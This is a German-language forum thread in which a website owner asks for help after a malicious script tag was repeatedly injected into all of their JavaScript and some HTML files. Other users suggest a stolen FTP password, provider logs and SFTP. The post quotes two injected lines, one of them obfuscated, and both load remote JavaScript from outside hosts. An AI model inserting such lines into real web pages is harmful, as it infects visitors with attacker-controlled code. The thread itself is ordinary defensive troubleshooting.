nicht angemeldet
fremdes Script (Virus) in allen Dateien meiner Website
0 0 0 
Struppi
fremdes Script (Virus) in allen Dateien meiner Website
Hallo Zusammen,
Habe ein großes Problem, das ich einfach nicht lösen kann! Bei einem Besuch meiner eigenen Website letzte Woche schlug mein AntiVirus Programm Alarm! Daraufhin hab ich mir den Quellcode meiner Index-Seite angeschaut und siehe da, es wurde eine zusätzliche Zeile eingefügt:
document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/Web_20.js"></scr'+'ipt>');
Danach durchforstete ich den Rest der Website und stellte fest, dass diese Zeile zusätzlich zu einigen html Dateien in ALLEN javascript Dateien meiner Website war!
Jetzt hab ich Sie manuell gelöscht, doch heute morgen das gleiche wieder!
Aktuelle Zeile
<script type="text/javascript" src="http://kolpo.gunterschaub.com:8080/Macro.js"></script>
Kann mir jemand sagen wie das kommen kann bzw. was ich dagegen unternehmen kann? FTP Passwort wurde schon mehrmals geändert, auch kann ich mir nicht vorstellen dass ich ein unsicheres Script auf meiner Website hab!
Vielen Dank schon einmal
-
Seid gegrüßt!
ich vermute jetzt mal, das durch einen Keylogger oder anderes Schadprogramm auf deinem Rechner oder z.B. in unsicheres WLAN, das FTP-Passwort bekannt wurde. Dadurch hat -obwohl du das Passwort änderst- der Angreifer jedes mal ein korrektes Passwort.
Somit ist es ihm problemlos möglich deine Seiten nach seinen Bedürfnissen zu ändern und diese Scripte unterzubringen.
Scher kann dein Provider hier in seinen Log-Dateien nachschauen wann und wie die Änderungen durchgeführt wurden. Ich vermute FTP.
--
Bis Später
RuD
.................................................................
Mein Weblog:
http://blog.rudweb.de/
-
Hallo Zusammen,
Vielen Dank für eure Antworten! Hab jetzt erst mal meinen Provider "eingeschaltet", weil ich selber einfach zu keiner Lösung komme! Mal schauen was die sagen,
Schöne Grüße
-
-
Welches Einfallstor der Angreifer verwendet hat, kann man meistens nicht pauschal sagen. Es kann der FTP-Server sein, aber auch ein Rootkit, eine SQL-Injection oder jeder andere Prozess, der im Netzwerk verfügbar ist.
FTP ist jedoch generell etwas unsicher, so dass man besser SSH/SFTP verwendet.
Gruß, LX
--
RFC 1925, Satz 2: Egal, wie fest man schiebt, ganz gleich, wie hoch die Priorität ist, man kann die Lichtgeschwindigkeit nicht erhöhen. -
Kann mir jemand sagen wie das kommen kann bzw. was ich dagegen unternehmen kann? FTP Passwort wurde schon mehrmals geändert, auch kann ich mir nicht vorstellen dass ich ein unsicheres Script auf meiner Website hab!
"nicht vorstellen" heißt du bist nicht sicher?
Da du Schadcode auf deiner Seite hast, ist es aber relativ wahrscheinlich, dass du ein unsicheres Skript auf der Seite hast.Aber es gibt durchaus noch andere Möglichkeiten. Dazu müßtest du versuchen rauszufinden, ob es möglich ist anhand des Code, den Verursacher zu ermitteln.
Struppi.
-
